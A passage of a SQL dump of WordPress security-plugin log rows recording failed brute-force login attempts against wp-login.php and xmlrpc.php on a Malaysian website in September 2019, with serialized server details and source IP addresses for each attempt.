23:28:18',18257720,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'116.203.198.2'),(24790,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"107.189.2.90\";s:11:\"REMOTE_PORT\";s:5:\"46462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFsW475s89pqgR69SLmOwAAAZI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568762971.9128\";s:12:\"REQUEST_TIME\";s:10:\"1568762971\";}}','notice','2019-09-17 23:29:33','2019-09-17 23:29:32',17740648,19231488,'https://bintara.com.my/wp-login.php',1,0,'107.189.2.90'),(24791,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"107.189.2.90\";s:11:\"REMOTE_PORT\";s:5:\"49002\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFsXyR0vdvYEIduPCLQVQAAARg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568762975.6802\";s:12:\"REQUEST_TIME\";s:10:\"1568762975\";}}','notice','2019-09-17 23:29:37','2019-09-17 23:29:36',18257632,19557776,'https://bintara.com.my/xmlrpc.php',1,0,'107.189.2.90'),(24792,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"216.57.225.2\";s:11:\"REMOTE_PORT\";s:5:\"50944\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFuGY75s89pqgR69SLnPgAAAYk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568763417.4993\";s:12:\"REQUEST_TIME\";s:10:\"1568763417\";}}','notice','2019-09-17 23:36:58','2019-09-17 23:36:57',17740048,19232752,'https://bintara.com.my/wp-login.php',1,0,'216.57.225.2'),(24793,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"216.57.226.2\";s:11:\"REMOTE_PORT\";s:5:\"52070\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFuHI75s89pqgR69SLnQAAAAZA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568763420.6324\";s:12:\"REQUEST_TIME\";s:10:\"1568763420\";}}','notice','2019-09-17 23:37:02','2019-09-17 23:37:00',18257632,19557776,'https://bintara.com.my/xmlrpc.php',1,0,'216.57.226.2'),(24794,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"56406\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFvYI75s89pqgR69SLnxwAAAY0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568763744.5678\";s:12:\"REQUEST_TIME\";s:10:\"1568763744\";}}','notice','2019-09-17 23:42:25','2019-09-17 23:42:24',17739856,19230680,'https://bintara.com.my/wp-login.php',1,0,'185.84.180.90'),(24795,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"185.84.180.90\";s:11:\"REMOTE_PORT\";s:5:\"56718\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFvY475s89pqgR69SLnyQAAAYw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568763747.4057\";s:12:\"REQUEST_TIME\";s:10:\"1568763747\";}}','notice','2019-09-17 23:42:28','2019-09-17 23:42:27',18257720,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'185.84.180.90'),(24796,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.62.33.222\";s:11:\"REMOTE_PORT\";s:5:\"54158\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFv5m4SfF9g@8lNlxwksAAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568763878.8846\";s:12:\"REQUEST_TIME\";s:10:\"1568763878\";}}','notice','2019-09-17 23:44:40','2019-09-17 23:44:39',17740072,19231520,'https://bintara.com.my/wp-login.php',1,0,'178.62.33.222'),(24797,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.62.33.222\";s:11:\"REMOTE_PORT\";s:5:\"54678\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFv6Y75s89pqgR69SLn@wAAAZg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568763881.9769\";s:12:\"REQUEST_TIME\";s:10:\"1568763881\";}}','notice','2019-09-17 23:44:43','2019-09-17 23:44:42',18257720,19555920,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.33.222'),(24798,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.117.212.32\";s:11:\"REMOTE_PORT\";s:5:\"47008\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYFxOyqbKGlf1IVly7OAVgAAAUk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568764219.7507\";s:12:\"REQUEST_TIME\";s:10:\"1568764219\";}}','notice','2019-09-17 23:50:21','2019-09-17 